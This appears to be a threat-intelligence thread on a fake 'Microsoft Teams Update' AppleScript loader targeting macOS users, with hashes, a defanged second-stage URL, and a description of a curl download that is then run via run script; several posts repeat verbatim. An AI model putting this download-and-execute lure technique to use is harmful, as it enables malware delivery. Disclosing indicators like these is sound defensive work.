North Korean hackers are pushing fake Microsoft Teams Update to macOS users
Contents
1/ North Korean hackers are pushing fake "Microsoft Teams Update" to #macOS users. We detected an ongoing campaign, which is consistent with #DPRK recruitment/crypto-targeting ops, today in France.
Filename: Microsoft Teams Update.scpt
SHA256: d4310e8286fc3e29c7dce8ed8ccffe3bbc1a38369cdeec55095d5716dd89e624
Size: 2224 bytes
Likely related to: https://x.com/malwrhunterteam/status/1992990780521124298…
2/ The loader is written in AppleScript and branded as a “Microsoft Teams Live SDK update”. To look trustworthy, it first opens a legitimate Microsoft Teams page in the background (the “What’s new” or documentation page) so a user sees something normal in their browser ...
3/ The malicious part lives here 👇
It uses 'curl -L -k' command to download a second-stage script from: https[:]//support.ms-live[.]com/519738/check
Then executes the downloaded content via run script in AppleScript.
4/ We’ve previously seen related loaders on VirusTotal:
9135fb9e74bdb39828bfecf7919430062ce482a523999bd7ff1a368038f32371
14aba88b5f87ab9415bbca855d24abc3f151b819302930897e71e2626e823271
81c4ce82fe26e333a46e8a3d876e35b39725bda0a47f9c37ffc956d37da2d8fa
Filename: Microsoft Teams Update.scpt
SHA256: d4310e8286fc3e29c7dce8ed8ccffe3bbc1a38369cdeec55095d5716dd89e624
Size: 2224 bytes
Likely related to: https://x.com/malwrhunterteam/status/1992990780521124298…
2/ The loader is written in AppleScript and branded as a “Microsoft Teams Live SDK update”. To look trustworthy, it first opens a legitimate Microsoft Teams page in the background (the “What’s new” or documentation page) so a user sees something normal in their browser ...
3/ The malicious part lives here 👇
It uses 'curl -L -k' command to download a second-stage script from: https[:]//support.ms-live[.]com/519738/check
Then executes the downloaded content via run script in AppleScript.
4/ We’ve previously seen related loaders on VirusTotal:
9135fb9e74bdb39828bfecf7919430062ce482a523999bd7ff1a368038f32371
14aba88b5f87ab9415bbca855d24abc3f151b819302930897e71e2626e823271
81c4ce82fe26e333a46e8a3d876e35b39725bda0a47f9c37ffc956d37da2d8fa